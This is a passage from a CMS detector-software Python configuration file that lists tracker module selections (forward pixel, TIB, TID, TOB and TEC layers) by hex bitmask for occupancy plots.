cms.PSet(detSelection=cms.uint32(215),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1f8f03fc-0x1481010c")), # FPix minus
cms.PSet(detSelection=cms.uint32(216),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1f8f03fc-0x1481020c")), # FPix minus
cms.PSet(detSelection=cms.uint32(217),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1f8f03fc-0x14810110")), # FPix minus
# cms.PSet(detSelection=cms.uint32(),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1f8f03fc-0x14810210")) # FPix minus
cms.PSet(detSelection=cms.uint32(221),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1f8f03fc-0x14820104")), # FPix minus
cms.PSet(detSelection=cms.uint32(222),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1f8f03fc-0x14820204")), # FPix minus
cms.PSet(detSelection=cms.uint32(223),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1f8f03fc-0x14820108")), # FPix minus
cms.PSet(detSelection=cms.uint32(224),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1f8f03fc-0x14820208")), # FPix minus
cms.PSet(detSelection=cms.uint32(225),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1f8f03fc-0x1482010c")), # FPix minus
cms.PSet(detSelection=cms.uint32(226),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1f8f03fc-0x1482020c")), # FPix minus
cms.PSet(detSelection=cms.uint32(227),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1f8f03fc-0x14820110")), # FPix minus
# cms.PSet(detSelection=cms.uint32(),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1f8f03fc-0x14820210")) # FPix minus
cms.PSet(detSelection=cms.uint32(231),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1f8f03fc-0x15010104")), # FPix minus
cms.PSet(detSelection=cms.uint32(232),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1f8f03fc-0x15010204")), # FPix minus
cms.PSet(detSelection=cms.uint32(233),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1f8f03fc-0x15010108")), # FPix minus
cms.PSet(detSelection=cms.uint32(234),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1f8f03fc-0x15010208")), # FPix minus
cms.PSet(detSelection=cms.uint32(235),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1f8f03fc-0x1501010c")), # FPix minus
cms.PSet(detSelection=cms.uint32(236),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1f8f03fc-0x1501020c")), # FPix minus
cms.PSet(detSelection=cms.uint32(237),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1f8f03fc-0x15010110")), # FPix minus
# cms.PSet(detSelection=cms.uint32(),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1f8f03fc-0x15010210")) # FPix minus
cms.PSet(detSelection=cms.uint32(241),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1f8f03fc-0x15020104")), # FPix minus
cms.PSet(detSelection=cms.uint32(242),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1f8f03fc-0x15020204")), # FPix minus
cms.PSet(detSelection=cms.uint32(243),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1f8f03fc-0x15020108")), # FPix minus
cms.PSet(detSelection=cms.uint32(244),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1f8f03fc-0x15020208")), # FPix minus
cms.PSet(detSelection=cms.uint32(245),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1f8f03fc-0x1502010c")), # FPix minus
cms.PSet(detSelection=cms.uint32(246),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1f8f03fc-0x1502020c")), # FPix minus
cms.PSet(detSelection=cms.uint32(247),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1f8f03fc-0x15020110")) # FPix minus
# cms.PSet(detSelection=cms.uint32(),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1f8f03fc-0x15020210")) # FPix minus
)
OccupancyPlotsStripWantedSubDets = cms.VPSet (
cms.PSet(detSelection=cms.uint32(1101),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e01fc0c-0x1600640c")), # TIB+ L1 int m3
cms.PSet(detSelection=cms.uint32(1102),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e01fc0c-0x1600680c")), # TIB+ L1 ext m3
cms.PSet(detSelection=cms.uint32(1103),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e01fc0c-0x16006408")), # TIB+ L1 int m2
cms.PSet(detSelection=cms.uint32(1104),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e01fc0c-0x16006808")), # TIB+ L1 ext m2
cms.PSet(detSelection=cms.uint32(1105),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e01fc0c-0x16006404")), # TIB+ L1 int m1
cms.PSet(detSelection=cms.uint32(1106),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e01fc0c-0x16006804")), # TIB+ L1 ext m1
cms.PSet(detSelection=cms.uint32(1107),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e01fc0c-0x16005404")), # TIB- L1 int m1
cms.PSet(detSelection=cms.uint32(1108),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e01fc0c-0x16005804")), # TIB- L1 ext m1
cms.PSet(detSelection=cms.uint32(1109),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e01fc0c-0x16005408")), # TIB- L1 int m2
cms.PSet(detSelection=cms.uint32(1110),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e01fc0c-0x16005808")), # TIB- L1 ext m2
cms.PSet(detSelection=cms.uint32(1111),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e01fc0c-0x1600540c")), # TIB- L1 int m3
cms.PSet(detSelection=cms.uint32(1112),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e01fc0c-0x1600580c")), # TIB- L1 ext m3
cms.PSet(detSelection=cms.uint32(1201),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e01fc0c-0x1600a80c")), # TIB+ L2 ext m3
cms.PSet(detSelection=cms.uint32(1202),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e01fc0c-0x1600a40c")), # TIB+ L2 int m3
cms.PSet(detSelection=cms.uint32(1203),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e01fc0c-0x1600a808")), # TIB+ L2 ext m2
cms.PSet(detSelection=cms.uint32(1204),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e01fc0c-0x1600a408")), # TIB+ L2 int m2
cms.PSet(detSelection=cms.uint32(1205),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e01fc0c-0x1600a804")), # TIB+ L2 ext m1
cms.PSet(detSelection=cms.uint32(1206),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e01fc0c-0x1600a404")), # TIB+ L2 int m1
cms.PSet(detSelection=cms.uint32(1207),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e01fc0c-0x16009804")), # TIB- L2 ext m1
cms.PSet(detSelection=cms.uint32(1208),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e01fc0c-0x16009404")), # TIB- L2 int m1
cms.PSet(detSelection=cms.uint32(1209),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e01fc0c-0x16009808")), # TIB- L2 ext m2
cms.PSet(detSelection=cms.uint32(1210),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e01fc0c-0x16009408")), # TIB- L2 int m2
cms.PSet(detSelection=cms.uint32(1211),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e01fc0c-0x1600980c")), # TIB- L2 ext m3
cms.PSet(detSelection=cms.uint32(1212),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e01fc0c-0x1600940c")), # TIB- L2 int m3
cms.PSet(detSelection=cms.uint32(1301),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e01fc0c-0x1600e40c")), # TIB+ L3 int m3
cms.PSet(detSelection=cms.uint32(1302),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e01fc0c-0x1600e80c")), # TIB+ L3 ext m3
cms.PSet(detSelection=cms.uint32(1303),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e01fc0c-0x1600e408")), # TIB+ L3 int m2
cms.PSet(detSelection=cms.uint32(1304),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e01fc0c-0x1600e808")), # TIB+ L3 ext m2
cms.PSet(detSelection=cms.uint32(1305),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e01fc0c-0x1600e404")), # TIB+ L3 int m1
cms.PSet(detSelection=cms.uint32(1306),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e01fc0c-0x1600e804")), # TIB+ L3 ext m1
cms.PSet(detSelection=cms.uint32(1307),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e01fc0c-0x1600d404")), # TIB- L3 int m1
cms.PSet(detSelection=cms.uint32(1308),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e01fc0c-0x1600d804")), # TIB- L3 ext m1
cms.PSet(detSelection=cms.uint32(1309),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e01fc0c-0x1600d408")), # TIB- L3 int m2
cms.PSet(detSelection=cms.uint32(1310),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e01fc0c-0x1600d808")), # TIB- L3 ext m2
cms.PSet(detSelection=cms.uint32(1311),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e01fc0c-0x1600d40c")), # TIB- L3 int m3
cms.PSet(detSelection=cms.uint32(1312),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e01fc0c-0x1600d80c")), # TIB- L3 ext m3
cms.PSet(detSelection=cms.uint32(1401),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e01fc0c-0x1601280c")), # TIB+ L4 ext m3
cms.PSet(detSelection=cms.uint32(1402),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e01fc0c-0x1601240c")), # TIB+ L4 int m3
cms.PSet(detSelection=cms.uint32(1403),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e01fc0c-0x16012808")), # TIB+ L4 ext m2
cms.PSet(detSelection=cms.uint32(1404),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e01fc0c-0x16012408")), # TIB+ L4 int m2
cms.PSet(detSelection=cms.uint32(1405),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e01fc0c-0x16012804")), # TIB+ L4 ext m1
cms.PSet(detSelection=cms.uint32(1406),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e01fc0c-0x16012404")), # TIB+ L4 int m1
cms.PSet(detSelection=cms.uint32(1407),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e01fc0c-0x16011804")), # TIB- L4 ext m1
cms.PSet(detSelection=cms.uint32(1408),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e01fc0c-0x16011404")), # TIB- L4 int m1
cms.PSet(detSelection=cms.uint32(1409),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e01fc0c-0x16011808")), # TIB- L4 ext m2
cms.PSet(detSelection=cms.uint32(1410),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e01fc0c-0x16011408")), # TIB- L4 int m2
cms.PSet(detSelection=cms.uint32(1411),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e01fc0c-0x1601180c")), # TIB- L4 ext m3
cms.PSet(detSelection=cms.uint32(1412),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e01fc0c-0x1601140c")), # TIB- L4 int m3
cms.PSet(detSelection=cms.uint32(2111),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e007f80-0x18002b00")), # TID- D1 R1 Front
cms.PSet(detSelection=cms.uint32(2112),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e007f80-0x18002a80")), # TID- D1 R1 Back
cms.PSet(detSelection=cms.uint32(2121),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e007f80-0x18003300")), # TID- D2 R1 Front
cms.PSet(detSelection=cms.uint32(2122),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e007f80-0x18003280")), # TID- D2 R1 Back
cms.PSet(detSelection=cms.uint32(2131),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e007f80-0x18003b00")), # TID- D3 R1 Front
cms.PSet(detSelection=cms.uint32(2132),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e007f80-0x18003a80")), # TID- D3 R1 Back
cms.PSet(detSelection=cms.uint32(2211),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e007f80-0x18002d00")), # TID- D1 R2 Front
cms.PSet(detSelection=cms.uint32(2212),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e007f80-0x18002c80")), # TID- D1 R2 Back
cms.PSet(detSelection=cms.uint32(2221),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e007f80-0x18003500")), # TID- D2 R2 Front
cms.PSet(detSelection=cms.uint32(2222),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e007f80-0x18003480")), # TID- D2 R2 Back
cms.PSet(detSelection=cms.uint32(2231),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e007f80-0x18003d00")), # TID- D3 R2 Front
cms.PSet(detSelection=cms.uint32(2232),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e007f80-0x18003c80")), # TID- D3 R2 Back
cms.PSet(detSelection=cms.uint32(2311),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e007f80-0x18002f00")), # TID- D1 R3 Front
cms.PSet(detSelection=cms.uint32(2312),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e007f80-0x18002e80")), # TID- D1 R3 Back
cms.PSet(detSelection=cms.uint32(2321),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e007f80-0x18003700")), # TID- D2 R3 Front
cms.PSet(detSelection=cms.uint32(2322),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e007f80-0x18003680")), # TID- D2 R3 Back
cms.PSet(detSelection=cms.uint32(2331),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e007f80-0x18003f00")), # TID- D3 R3 Front
cms.PSet(detSelection=cms.uint32(2332),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e007f80-0x18003e80")), # TID- D3 R3 Back
cms.PSet(detSelection=cms.uint32(2141),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e007f80-0x18004b00")), # TID+ D1 R1 Front
cms.PSet(detSelection=cms.uint32(2142),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e007f80-0x18004a80")), # TID+ D1 R1 Back
cms.PSet(detSelection=cms.uint32(2151),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e007f80-0x18005300")), # TID+ D2 R1 Front
cms.PSet(detSelection=cms.uint32(2152),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e007f80-0x18005280")), # TID+ D2 R1 Back
cms.PSet(detSelection=cms.uint32(2161),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e007f80-0x18005b00")), # TID+ D3 R1 Front
cms.PSet(detSelection=cms.uint32(2162),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e007f80-0x18005a80")), # TID+ D3 R1 Back
cms.PSet(detSelection=cms.uint32(2241),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e007f80-0x18004d00")), # TID+ D1 R2 Front
cms.PSet(detSelection=cms.uint32(2242),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e007f80-0x18004c80")), # TID+ D1 R2 Back
cms.PSet(detSelection=cms.uint32(2251),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e007f80-0x18005500")), # TID+ D2 R2 Front
cms.PSet(detSelection=cms.uint32(2252),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e007f80-0x18005480")), # TID+ D2 R2 Back
cms.PSet(detSelection=cms.uint32(2261),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e007f80-0x18005d00")), # TID+ D3 R2 Front
cms.PSet(detSelection=cms.uint32(2262),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e007f80-0x18005c80")), # TID+ D3 R2 Back
cms.PSet(detSelection=cms.uint32(2341),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e007f80-0x18004f00")), # TID+ D1 R3 Front
cms.PSet(detSelection=cms.uint32(2342),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e007f80-0x18004e80")), # TID+ D1 R3 Back
cms.PSet(detSelection=cms.uint32(2351),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e007f80-0x18005700")), # TID+ D2 R3 Front
cms.PSet(detSelection=cms.uint32(2352),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e007f80-0x18005680")), # TID+ D2 R3 Back
cms.PSet(detSelection=cms.uint32(2361),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e007f80-0x18005f00")), # TID+ D3 R3 Front
cms.PSet(detSelection=cms.uint32(2362),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e007f80-0x18005e80")), # TID+ D3 R3 Back
cms.PSet(detSelection=cms.uint32(3101),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e01f01c-0x1a006018")), # TOB+ L1 m6
cms.PSet(detSelection=cms.uint32(3102),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e01f01c-0x1a006014")), # TOB+ L1 m5
cms.PSet(detSelection=cms.uint32(3103),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e01f01c-0x1a006010")), # TOB+ L1 m4
cms.PSet(detSelection=cms.uint32(3104),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e01f01c-0x1a00600c")), # TOB+ L1 m3
cms.PSet(detSelection=cms.uint32(3105),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e01f01c-0x1a006008")), # TOB+ L1 m2
cms.PSet(detSelection=cms.uint32(3106),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e01f01c-0x1a006004")), # TOB+ L1 m1
cms.PSet(detSelection=cms.uint32(3107),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e01f01c-0x1a005004")), # TOB- L1 m1
cms.PSet(detSelection=cms.uint32(3108),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e01f01c-0x1a005008")), # TOB- L1 m2
cms.PSet(detSelection=cms.uint32(3109),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e01f01c-0x1a00500c")), # TOB- L1 m3
cms.PSet(detSelection=cms.uint32(3110),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e01f01c-0x1a005010")), # TOB- L1 m4
cms.PSet(detSelection=cms.uint32(3111),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e01f01c-0x1a005014")), # TOB- L1 m5
cms.PSet(detSelection=cms.uint32(3112),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e01f01c-0x1a005018")), # TOB- L1 m6
cms.PSet(detSelection=cms.uint32(3201),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e01f01c-0x1a00a018")), # TOB+ L2 m6
cms.PSet(detSelection=cms.uint32(3202),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e01f01c-0x1a00a014")), # TOB+ L2 m5
cms.PSet(detSelection=cms.uint32(3203),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e01f01c-0x1a00a010")), # TOB+ L2 m4
cms.PSet(detSelection=cms.uint32(3204),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e01f01c-0x1a00a00c")), # TOB+ L2 m3
cms.PSet(detSelection=cms.uint32(3205),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e01f01c-0x1a00a008")), # TOB+ L2 m2
cms.PSet(detSelection=cms.uint32(3206),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e01f01c-0x1a00a004")), # TOB+ L2 m1
cms.PSet(detSelection=cms.uint32(3207),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e01f01c-0x1a009004")), # TOB- L2 m1
cms.PSet(detSelection=cms.uint32(3208),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e01f01c-0x1a009008")), # TOB- L2 m2
cms.PSet(detSelection=cms.uint32(3209),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e01f01c-0x1a00900c")), # TOB- L2 m3
cms.PSet(detSelection=cms.uint32(3210),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e01f01c-0x1a009010")), # TOB- L2 m4
cms.PSet(detSelection=cms.uint32(3211),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e01f01c-0x1a009014")), # TOB- L2 m5
cms.PSet(detSelection=cms.uint32(3212),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e01f01c-0x1a009018")), # TOB- L2 m6
cms.PSet(detSelection=cms.uint32(3301),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e01f01c-0x1a00e018")), # TOB+ L3 m6
cms.PSet(detSelection=cms.uint32(3302),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e01f01c-0x1a00e014")), # TOB+ L3 m5
cms.PSet(detSelection=cms.uint32(3303),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e01f01c-0x1a00e010")), # TOB+ L3 m4
cms.PSet(detSelection=cms.uint32(3304),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e01f01c-0x1a00e00c")), # TOB+ L3 m3
cms.PSet(detSelection=cms.uint32(3305),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e01f01c-0x1a00e008")), # TOB+ L3 m2
cms.PSet(detSelection=cms.uint32(3306),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e01f01c-0x1a00e004")), # TOB+ L3 m1
cms.PSet(detSelection=cms.uint32(3307),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e01f01c-0x1a00d004")), # TOB- L3 m1
cms.PSet(detSelection=cms.uint32(3308),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e01f01c-0x1a00d008")), # TOB- L3 m2
cms.PSet(detSelection=cms.uint32(3309),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e01f01c-0x1a00d00c")), # TOB- L3 m3
cms.PSet(detSelection=cms.uint32(3310),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e01f01c-0x1a00d010")), # TOB- L3 m4
cms.PSet(detSelection=cms.uint32(3311),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e01f01c-0x1a00d014")), # TOB- L3 m5
cms.PSet(detSelection=cms.uint32(3312),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e01f01c-0x1a00d018")), # TOB- L3 m6
cms.PSet(detSelection=cms.uint32(3401),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e01f01c-0x1a012018")), # TOB+ L4 m6
cms.PSet(detSelection=cms.uint32(3402),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e01f01c-0x1a012014")), # TOB+ L4 m5
cms.PSet(detSelection=cms.uint32(3403),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e01f01c-0x1a012010")), # TOB+ L4 m4
cms.PSet(detSelection=cms.uint32(3404),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e01f01c-0x1a01200c")), # TOB+ L4 m3
cms.PSet(detSelection=cms.uint32(3405),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e01f01c-0x1a012008")), # TOB+ L4 m2
cms.PSet(detSelection=cms.uint32(3406),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e01f01c-0x1a012004")), # TOB+ L4 m1
cms.PSet(detSelection=cms.uint32(3407),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e01f01c-0x1a011004")), # TOB- L4 m1
cms.PSet(detSelection=cms.uint32(3408),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e01f01c-0x1a011008")), # TOB- L4 m2
cms.PSet(detSelection=cms.uint32(3409),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e01f01c-0x1a01100c")), # TOB- L4 m3
cms.PSet(detSelection=cms.uint32(3410),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e01f01c-0x1a011010")), # TOB- L4 m4
cms.PSet(detSelection=cms.uint32(3411),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e01f01c-0x1a011014")), # TOB- L4 m5
cms.PSet(detSelection=cms.uint32(3412),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e01f01c-0x1a011018")), # TOB- L4 m6
cms.PSet(detSelection=cms.uint32(3501),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e01f01c-0x1a016018")), # TOB+ L5 m6
cms.PSet(detSelection=cms.uint32(3502),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e01f01c-0x1a016014")), # TOB+ L5 m5
cms.PSet(detSelection=cms.uint32(3503),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e01f01c-0x1a016010")), # TOB+ L5 m4
cms.PSet(detSelection=cms.uint32(3504),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e01f01c-0x1a01600c")), # TOB+ L5 m3
cms.PSet(detSelection=cms.uint32(3505),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e01f01c-0x1a016008")), # TOB+ L5 m2
cms.PSet(detSelection=cms.uint32(3506),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e01f01c-0x1a016004")), # TOB+ L5 m1
cms.PSet(detSelection=cms.uint32(3507),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e01f01c-0x1a015004")), # TOB- L5 m1
cms.PSet(detSelection=cms.uint32(3508),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e01f01c-0x1a015008")), # TOB- L5 m2
cms.PSet(detSelection=cms.uint32(3509),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e01f01c-0x1a01500c")), # TOB- L5 m3
cms.PSet(detSelection=cms.uint32(3510),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e01f01c-0x1a015010")), # TOB- L5 m4
cms.PSet(detSelection=cms.uint32(3511),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e01f01c-0x1a015014")), # TOB- L5 m5
cms.PSet(detSelection=cms.uint32(3512),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e01f01c-0x1a015018")), # TOB- L5 m6
cms.PSet(detSelection=cms.uint32(3601),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e01f01c-0x1a01a018")), # TOB+ L6 m6
cms.PSet(detSelection=cms.uint32(3602),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e01f01c-0x1a01a014")), # TOB+ L6 m5
cms.PSet(detSelection=cms.uint32(3603),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e01f01c-0x1a01a010")), # TOB+ L6 m4
cms.PSet(detSelection=cms.uint32(3604),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e01f01c-0x1a01a00c")), # TOB+ L6 m3
cms.PSet(detSelection=cms.uint32(3605),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e01f01c-0x1a01a008")), # TOB+ L6 m2
cms.PSet(detSelection=cms.uint32(3606),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e01f01c-0x1a01a004")), # TOB+ L6 m1
cms.PSet(detSelection=cms.uint32(3607),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e01f01c-0x1a019004")), # TOB- L6 m1
cms.PSet(detSelection=cms.uint32(3608),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e01f01c-0x1a019008")), # TOB- L6 m2
cms.PSet(detSelection=cms.uint32(3609),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e01f01c-0x1a01900c")), # TOB- L6 m3
cms.PSet(detSelection=cms.uint32(3610),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e01f01c-0x1a019010")), # TOB- L6 m4
cms.PSet(detSelection=cms.uint32(3611),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e01f01c-0x1a019014")), # TOB- L6 m5
cms.PSet(detSelection=cms.uint32(3612),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e01f01c-0x1a019018")) # TOB- L6 m6
)
OccupancyPlotsStripWantedSubDets.extend(
cms.VPSet(
cms.PSet(detSelection=cms.uint32(4111),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0ff0e0-0x1c045020")), # TEC- D1 R1 back
